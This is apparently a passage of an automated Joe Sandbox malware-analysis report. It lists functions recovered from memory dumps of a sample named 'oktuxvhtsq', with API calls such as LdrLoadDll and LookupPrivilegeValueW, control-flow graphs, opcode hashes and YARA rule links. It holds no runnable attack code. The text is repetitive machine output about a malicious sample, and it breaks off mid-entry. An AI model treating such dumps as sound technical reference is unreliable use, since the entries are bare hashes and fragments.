                                  • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ACD3 Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 257 40acd3-40acdf 258 40ace1-40ad09 call 41cc10 257->258 259 40ad36-40ad3e 257->259 264 40ad0b-40ad0e 258->264 265 40ad0f-40ad1d call 41d030 258->265 260 40ad40-40ad54 LdrLoadDll 259->260 261 40ad57-40ad5a 259->261 260->261 268 40ad2d-40ad30 265->268 269 40ad1f-40ad2a call 41d2b0 265->269 268->259 271 40ad31 call 41b460 268->271 269->268 271->259
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction ID: 0bfba143c35a2662ea369b5dee50b939225e83d9b4356896b7ce44725816b03a
                                  • Opcode Fuzzy Hash: e90e30740199396d57f7cd7bed67e18ce7eee6ee49a4a5d75ff6d29f11778ce5
                                  • Instruction Fuzzy Hash: CAF0A475E0020DABDF10DAD1D882FDDB3B99F04308F0081A5ED1C9B680F634DA558B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A781 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 276 41a781-41a7aa call 41af20 278 41a7af-41a7c4 LookupPrivilegeValueW 276->278
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6c355d2cbf5d1b4ed7558bdf3e9a25f7b7103ffe2787569f64ceecb3d4f9df02
                                  • Instruction ID: b018fd4c02568a20dce40f53dd357ebc4a22aed1888aa1fead350740c09b2497
                                  • Opcode Fuzzy Hash: 6c355d2cbf5d1b4ed7558bdf3e9a25f7b7103ffe2787569f64ceecb3d4f9df02
                                  • Instruction Fuzzy Hash: 2DF0A9B12001446BEB14EF14CC89FEB3BA8EF8A314F108085FD4C9B242C534A9058BB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A623 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 41a623-41a647 call 41af20 281 41a64c-41a661 RtlFreeHeap 279->281
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 450c0ed355cb7b3709ac078d9ea1f7ab4aa96f1e572ba26de562b2ac3dea34c9
                                  • Instruction ID: 0611564a9146cbe0ee6bc4a384c8b6f7fa635fd505321bcb9219bc05b3340da6
                                  • Opcode Fuzzy Hash: 450c0ed355cb7b3709ac078d9ea1f7ab4aa96f1e572ba26de562b2ac3dea34c9
                                  • Instruction Fuzzy Hash: FDE0D8B51046845BDB01DF75D4D149737A5EF81318710954EF89947707C235C51ADBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 282 41a630-41a646 283 41a64c-41a661 RtlFreeHeap 282->283 284 41a647 call 41af20 282->284 284->283
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 285 41a790-41a7a9 286 41a7af-41a7c4 LookupPrivilegeValueW 285->286 287 41a7aa call 41af20 285->287 287->286
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A698
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00417D74 Relevance: 4.0, Strings: 3, Instructions: 275COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: =$www.$www.
                                  • API String ID: 0-3343787489
                                  • Opcode ID: 6d4ffc7fd2f7e5798f23f121e82b3a6d171adf2569ca5f4ed57d26bd2dac5154
                                  • Instruction ID: 068cf630603c46fe43a761a566bb2a59be3fbfb3dc0e4910e9399f7ca9c038ff
                                  • Opcode Fuzzy Hash: 6d4ffc7fd2f7e5798f23f121e82b3a6d171adf2569ca5f4ed57d26bd2dac5154
                                  • Instruction Fuzzy Hash: DFA1A6B6554344ABD714DBF0CCD1FEB737CAF44308F00465EB25A5B182DB78A6848BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00730060 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0073010C Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                  • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                  • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                  • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007301D4 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                  • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                  • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                  • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007307AC Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00730C40 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007310D0 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00731148 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                  • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                  • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                  • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00731930 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072F938 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FA50 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                  • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                  • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                  • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FA20 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                  • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                  • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FAB8 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
